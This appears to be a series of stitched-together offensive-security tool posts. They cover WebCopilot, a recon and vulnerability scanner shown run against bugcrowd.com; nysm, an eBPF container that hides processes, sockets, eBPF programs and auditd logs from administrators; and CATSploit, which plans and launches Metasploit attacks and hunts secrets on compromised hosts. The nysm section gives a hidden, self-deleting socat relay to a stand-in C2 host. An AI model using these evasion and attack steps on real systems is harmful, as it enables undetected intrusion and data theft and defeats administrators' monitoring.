β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                ──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinderβœ”] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3rβœ”] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinderβœ”] Subdomain Found: 54
[●] Subdoamin Scanned - [amassβœ”] Subdomain Found: 43
[●] Subdoamin Scanned - [findomainβœ”] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobusterβœ”] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amassβœ”] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
[●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
[●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
[●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
[●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
[●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
[●] Vulnerabilities Scanned - [Nuclieβœ”] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired from Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.


Nysm - A Stealth Post-Exploitation Container

By: Zion3R


A stealth post-exploitation container.

Introduction

With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps ️
  • New eBPF links ο”—
  • New Auditd generated logs ο“°
  • New PIDs οͺͺ
  • New sockets ο”Œ

Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

Β 

Installation

Requirements

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Build

cd ./nysm/src/
make

Usage

nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

Examples

Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.

Hide PIDS

Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.

Limitations

Even with the best effort, nysm still has some limitations.

  • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

  2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

  4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


Prerequisities

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
└──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
└──────────┴──────────────┴──────────┴──────────────┴─ β”€β”€β”€β”€β”€β”˜

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
└──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.1 0 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
